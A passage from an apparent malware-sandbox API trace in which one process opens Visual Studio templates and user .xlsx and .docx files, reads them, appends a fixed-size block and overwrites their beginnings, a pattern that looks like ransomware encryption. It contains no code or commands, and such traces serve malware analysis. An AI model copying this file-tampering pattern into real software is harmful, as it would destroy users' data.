lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0061.800] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0061.801] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0061.801] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0061.802] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x9fe000 [0061.802] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0061.803] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x9fe000 [0061.804] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef40000 [0061.816] VirtualQuery (in: lpAddress=0x7ef90000, lpBuffer=0x331f258, dwLength=0x1c | out: lpBuffer=0x331f258*(BaseAddress=0x7ef90000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x5000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0061.816] VirtualAlloc (lpAddress=0x0, dwSize=0x70000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eed0000 [0061.824] VirtualFree (lpAddress=0x7ef40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.830] VirtualQuery (in: lpAddress=0x7ef40000, lpBuffer=0x331f258, dwLength=0x1c | out: lpBuffer=0x331f258*(BaseAddress=0x7ef40000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x55000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0061.830] VirtualAlloc (lpAddress=0x7ef40000, dwSize=0x20000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ef40000 [0061.830] VirtualAlloc (lpAddress=0x7ef40000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ef40000 [0061.833] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x331f28c*=0x2588, lpOverlapped=0x0) returned 1 [0068.608] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0068.609] WriteFile (in: hFile=0x1d8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.610] WriteFile (in: hFile=0x1d8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.611] WriteFile (in: hFile=0x1d8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.612] WriteFile (in: hFile=0x1d8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.613] WriteFile (in: hFile=0x1d8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.615] WriteFile (in: hFile=0x1d8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.616] WriteFile (in: hFile=0x1d8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.616] WriteFile (in: hFile=0x1d8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.617] WriteFile (in: hFile=0x1d8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0068.618] VirtualQuery (in: lpAddress=0x7eed0000, lpBuffer=0x331f2b0, dwLength=0x1c | out: lpBuffer=0x331f2b0*(BaseAddress=0x7eed0000, AllocationBase=0x7eed0000, AllocationProtect=0x4, RegionSize=0x70000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.618] VirtualFree (lpAddress=0x7eed0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.621] VirtualQuery (in: lpAddress=0x7ef40000, lpBuffer=0x331f2b0, dwLength=0x1c | out: lpBuffer=0x331f2b0*(BaseAddress=0x7ef40000, AllocationBase=0x7ef40000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.621] VirtualFree (lpAddress=0x7ef40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.623] CloseHandle (hObject=0x1d8) returned 1 [0072.659] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AssemblyInfo.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\assemblyinfo.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0072.669] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.669] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x492 [0072.670] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.670] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.670] ReleaseMutex (hMutex=0x168) returned 1 [0072.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AssemblyInfo.zip", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0072.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AssemblyInfo.zip", cchWideChar=16, lpMultiByteStr=0x1f8867c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AssemblyInfo.zip", lpUsedDefaultChar=0x0) returned 16 [0072.670] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0038, nNumberOfBytesToRead=0x492, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesRead=0x331f2bc*=0x492, lpOverlapped=0x0) returned 1 [0072.672] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0072.673] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa1a, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x331f2d0*=0xa1a, lpOverlapped=0x0) returned 1 [0072.673] CloseHandle (hObject=0x1d8) returned 1 [0072.674] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\mdiparent.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0072.674] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.675] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3719 [0072.675] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.675] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.675] ReleaseMutex (hMutex=0x168) returned 1 [0072.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MDIParent.zip", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MDIParent.zip", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MDIParent.zip", lpUsedDefaultChar=0x0) returned 13 [0072.675] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.678] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2719 [0072.679] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.679] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2719 [0072.679] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.679] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0072.679] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.680] CloseHandle (hObject=0x1d8) returned 1 [0072.680] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\xmlfile.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0072.681] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.681] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x251 [0072.681] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.681] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.681] ReleaseMutex (hMutex=0x168) returned 1 [0072.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XmlFile.zip", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0072.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XmlFile.zip", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XmlFile.zip", lpUsedDefaultChar=0x0) returned 11 [0072.681] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f64ee8, nNumberOfBytesToRead=0x251, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f64ee8*, lpNumberOfBytesRead=0x331f2bc*=0x251, lpOverlapped=0x0) returned 1 [0072.683] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0072.683] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a81c8*, nNumberOfBytesToWrite=0x7d9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a81c8*, lpNumberOfBytesWritten=0x331f2d0*=0x7d9, lpOverlapped=0x0) returned 1 [0072.683] CloseHandle (hObject=0x1d8) returned 1 [0072.684] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\form.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0072.684] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.685] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x514 [0072.685] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.685] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.685] ReleaseMutex (hMutex=0x168) returned 1 [0072.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Form.zip", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0072.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Form.zip", cchWideChar=8, lpMultiByteStr=0x1f7342c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Form.zip", lpUsedDefaultChar=0x0) returned 8 [0072.685] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f3c368, nNumberOfBytesToRead=0x514, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3c368*, lpNumberOfBytesRead=0x331f2bc*=0x514, lpOverlapped=0x0) returned 1 [0072.688] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0072.688] WriteFile (in: hFile=0x1d8, lpBuffer=0x2868a88*, nNumberOfBytesToWrite=0xa9c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2868a88*, lpNumberOfBytesWritten=0x331f2d0*=0xa9c, lpOverlapped=0x0) returned 1 [0072.689] CloseHandle (hObject=0x1d8) returned 1 [0072.689] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\usercontrol.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0072.690] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.690] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5b1 [0072.690] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.690] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.690] ReleaseMutex (hMutex=0x168) returned 1 [0072.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UserControl.zip", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0072.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UserControl.zip", cchWideChar=15, lpMultiByteStr=0x1f7352c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserControl.zip", lpUsedDefaultChar=0x0) returned 15 [0072.691] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5b1, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x331f2bc*=0x5b1, lpOverlapped=0x0) returned 1 [0072.692] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0072.693] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eaab88*, nNumberOfBytesToWrite=0xb39, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eaab88*, lpNumberOfBytesWritten=0x331f2d0*=0xb39, lpOverlapped=0x0) returned 1 [0072.693] CloseHandle (hObject=0x1d8) returned 1 [0072.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\uO2w8Fd2.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ls gbmc\\uo2w8fd2.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0072.694] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.694] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x32a3 [0072.695] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.695] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.695] ReleaseMutex (hMutex=0x168) returned 1 [0072.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uO2w8Fd2.xlsx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uO2w8Fd2.xlsx", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uO2w8Fd2.xlsx", lpUsedDefaultChar=0x0) returned 13 [0072.695] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.696] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x22a3 [0072.697] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.697] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x22a3 [0072.697] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.697] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0072.698] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.698] CloseHandle (hObject=0x1d8) returned 1 [0072.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G5NYori65YA.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g5nyori65ya.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0072.699] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.699] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x10118 [0072.699] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0072.699] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.699] ReleaseMutex (hMutex=0x168) returned 1 [0072.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="G5NYori65YA.docx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0072.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="G5NYori65YA.docx", cchWideChar=16, lpMultiByteStr=0x1f88b2c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G5NYori65YA.docx", lpUsedDefaultChar=0x0) returned 16 [0072.700] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.701] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xf118 [0072.701] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.701] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xf118 [0072.702] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.702] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: 